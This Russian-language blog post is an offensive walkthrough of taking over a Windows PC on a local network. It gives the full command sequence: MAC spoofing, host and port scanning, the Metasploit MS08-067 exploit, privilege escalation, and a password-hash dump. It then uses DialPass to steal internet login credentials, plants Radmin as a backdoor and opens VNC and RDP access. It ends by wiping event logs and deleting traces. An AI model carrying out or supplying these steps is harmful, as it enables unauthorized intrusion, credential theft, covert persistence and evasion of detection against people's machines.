Metasploit Framework в бою

 

Организация взлома ПК внутри локальной сети посредством Metasploit Framework

Далее комментарии по происходящему. В начале меняем свой MAC адрес при помощи пакета macchanger.

sudo macchanger eth0 --mac=00:11:22:33:44:55


Перед этой процедурой интерфейс eth0 должен быть отключен вот так:

sudo ifconfig eth0 down


Далее включаем интерфейс eth0 и смотрим изменился ли MAC адрес1

sudo ifconfig eth0 up
ifconfig eth0



Используя пакет arp-scan посмотрим кто есть в сети:

sudo arp-scan -l -I eth0


Выбираем жертву и смотрим на открытые порты посредством nmap

nmap 192.168.84.58


135/tcp msrpc навел на мысль о возможной дыре в безопасности данного пк т.е. о ms08-067. Уязвимость в библиотеке netapi32.dll при выполнении RPC запросов к службе Server. С помощью специально сформированного RPC запроса можно вызвать переполнение буфера и вызвать отказ в обслуживании системы, либо выполнить произвольный код от учетной записи SYSTEM. Подробнее… Далее для исполнения данной атаки запускаем Metasploit Framework и загружаем эксплоит для данной ошибки.

msfconsole
use exploit/windows/smb/ms08_067_netapi



Смотрим на обязательные параметры эксплоита и заполняем их.

show options
set RHOST 192.168.84.58



Проверяем есть ли уязвимость, видим что есть, атакуем.1
check
exploit


Узнаем наши права в системе и если необходимо повышаем привилегий до системных. 

getuid
getsystem



Далее вытаскиваем пароли, брутим их по словарю в SAMInside1 hashdump


Заливаем DialPass на компьютер жертвы и уводим логин и пароль на доступ в интернет. Удаляем следы данной операции.

upload exploit/dialpass/dp.exe dp.exe
execute -f "dp.exe /stext dp"
cat dp
del dp dp.exe



Заливаем Radmin для дальнейшего эксплуатации данного компьютера. Смотрим в новой консоли открылся ли порт и удаляем следы данной операции.

upload exploit/radmin/radmin.exe radmin.exe
execute -f "radmin.exe"
nmap 192.168.84.58
del radmin.exe



Запускаем VNC соединение (прим. для этого необходимо установить пакет vncviewer) и настраиваем RDP доступ к компьютеру (Radmin это хорошо, но мало ли что случится).1 run vnc


Ну а далее запускаем remmina, подключаемся по RDP и удаляем лишние файлы. Далее зачищаем за собой и уходим. Удаляем хост из базы Metasploit Framework.

clearev
exit
hosts -d 192.168.84.58



Смотрим какие порты открыты и убеждаемся, что Radmin и RDP функционируют.

nmap 192.168.84.58

Вот так я порутал свой PC =).

источник: chelaxe.ru


Комментарии

Популярные сообщения из этого блога

S.M.A.R.T. (часть 3). Расшифровка и понимание SMART атрибутов

S.M.A.R.T. (часть 2). Мониторинг BBU RAID контроллеров

Обзор системы хранения Intel SS4200-E начального уровня